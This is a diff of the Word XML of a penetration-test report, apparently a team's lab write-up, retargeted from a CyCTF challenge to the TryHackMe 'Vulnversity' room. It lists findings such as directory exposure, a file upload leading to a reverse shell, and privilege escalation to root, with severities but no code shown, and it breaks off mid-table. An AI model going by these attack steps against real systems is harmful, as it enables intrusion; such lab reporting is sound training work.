--- a/report/omerta-final.docx
+++ b/report/omerta-final.docx
@@ -56,7 +56,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc188314204" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079543" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -98,7 +98,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314204 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079543 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -142,7 +142,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314205" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079544" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -186,7 +186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314205 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079544 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -230,7 +230,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314206" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079545" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -272,7 +272,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314206 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079545 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -316,7 +316,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314207" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079546" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -358,7 +358,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314207 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079546 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -402,7 +402,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314208" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079547" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -444,7 +444,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314208 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079547 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -488,7 +488,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314209" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079548" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -530,7 +530,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314209 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079548 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -574,7 +574,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314210" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079549" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -617,7 +617,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314210 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079549 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -661,7 +661,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314211" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079550" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -703,7 +703,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314211 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079550 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -747,7 +747,7 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc188314212" w:history="1">
+          <w:hyperlink w:anchor="_Toc215079551" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -768,7 +768,7 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>privelege escalation to root access</w:t>
+              <w:t>exposed services</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -789,7 +789,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc188314212 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079551 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -833,6 +833,253 @@
               <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
+          <w:hyperlink w:anchor="_Toc215079552" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>5.2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Directory Listing / Directory Exposure</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079552 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc215079553" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>5.3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>File Upload leading to Reverse Shell</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079553 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc215079554" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>5.4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>privilege escalation to get root/admin access</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215079554 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
         </w:p>
         <w:p>
           <w:r>
@@ -868,7 +1115,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_Toc186041932"/>
-      <w:bookmarkStart w:id="2" w:name="_Toc188314204"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc215079543"/>
       <w:bookmarkStart w:id="3" w:name="_Toc186041931"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -913,7 +1160,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="4" w:name="_Toc186041933"/>
-      <w:bookmarkStart w:id="5" w:name="_Toc188314205"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc215079544"/>
       <w:r>
         <w:rPr>
           <w:lang w:bidi="ar-EG"/>
@@ -1066,14 +1313,16 @@
                 <w:lang w:bidi="ar-EG"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:cs="Calibri"/>
                 <w:szCs w:val="24"/>
                 <w:lang w:bidi="ar-EG"/>
               </w:rPr>
-              <w:t>CyCTF</w:t>
-            </w:r>
+              <w:t>Vulnversity</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1095,7 +1344,7 @@
                 <w:rFonts w:cstheme="minorHAnsi"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>NOV</w:t>
+              <w:t>Nov</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1154,7 +1403,7 @@
                 <w:rFonts w:cstheme="minorHAnsi"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>NOV</w:t>
+              <w:t>Nov</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1168,7 +1417,7 @@
                 <w:rFonts w:cstheme="minorHAnsi"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1214,7 +1463,7 @@
                 <w:szCs w:val="24"/>
                 <w:lang w:bidi="ar-EG"/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1237,7 +1486,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:bookmarkStart w:id="6" w:name="_Toc186041934"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc188314206"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc215079545"/>
       <w:r>
         <w:t>Targets</w:t>
       </w:r>
@@ -1252,14 +1501,30 @@
         <w:rPr>
           <w:lang w:bidi="ar-EG"/>
         </w:rPr>
-        <w:t xml:space="preserve">The below scope was </w:t>
-      </w:r>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:bidi="ar-EG"/>
         </w:rPr>
-        <w:t>CyCTF</w:t>
-      </w:r>
+        <w:t>below scope</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> was </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+        <w:t>Vulnversity</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -1354,9 +1619,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:r>
-              <w:t>https://cyctf-4845ded1873e-escape-0-0.chals.io/</w:t>
-            </w:r>
+            <w:hyperlink r:id="rId8" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://tryhackme.com/room/vulnversity</w:t>
+              </w:r>
+            </w:hyperlink>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1372,7 +1642,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:bookmarkStart w:id="8" w:name="_Toc186041935"/>
-      <w:bookmarkStart w:id="9" w:name="_Toc188314207"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc215079546"/>
       <w:r>
         <w:t>Limitations</w:t>
       </w:r>
@@ -1416,7 +1686,28 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Altering any data in the system </w:t>
+        <w:t>Social Engineering.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">manipulation of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> data</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1438,7 +1729,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc188314208"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc215079547"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Finding Overview</w:t>
@@ -1461,7 +1752,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Vector</w:t>
+        <w:t>omerta-team</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -1598,23 +1889,7 @@
                   <w:b w:val="0"/>
                   <w:bCs w:val="0"/>
                 </w:rPr>
-                <w:t>Vuln</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                  <w:b w:val="0"/>
-                  <w:bCs w:val="0"/>
-                </w:rPr>
-                <w:t xml:space="preserve"> </w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                  <w:b w:val="0"/>
-                  <w:bCs w:val="0"/>
-                </w:rPr>
-                <w:t>01</w:t>
+                <w:t>Vuln 01</w:t>
               </w:r>
             </w:hyperlink>
           </w:p>
@@ -1631,14 +1906,14 @@
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
             <w:r>
-              <w:t>Privilege Escalation to root access</w:t>
+              <w:t>Exposed Services</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2695" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="EE0000"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -1659,7 +1934,251 @@
                 <w:bCs/>
                 <w:color w:val="FFFFFF" w:themeColor="background1"/>
               </w:rPr>
-              <w:t>HIGH</w:t>
+              <w:t xml:space="preserve">Informative </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="440"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1165" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:hyperlink w:anchor="_Information_Disclosure" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:b w:val="0"/>
+                  <w:bCs w:val="0"/>
+                </w:rPr>
+                <w:t>Vuln 02</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5490" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>Directory Listing / Directory Exposure</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2695" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Medium </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="440"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1165" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Vuln 03</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5490" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>File Upload leading to Reverse Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2695" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Critical </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="440"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1165" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Vuln 04 </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5490" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>privilege escalation to get root/admin access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2695" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:b/>
+                <w:bCs/>
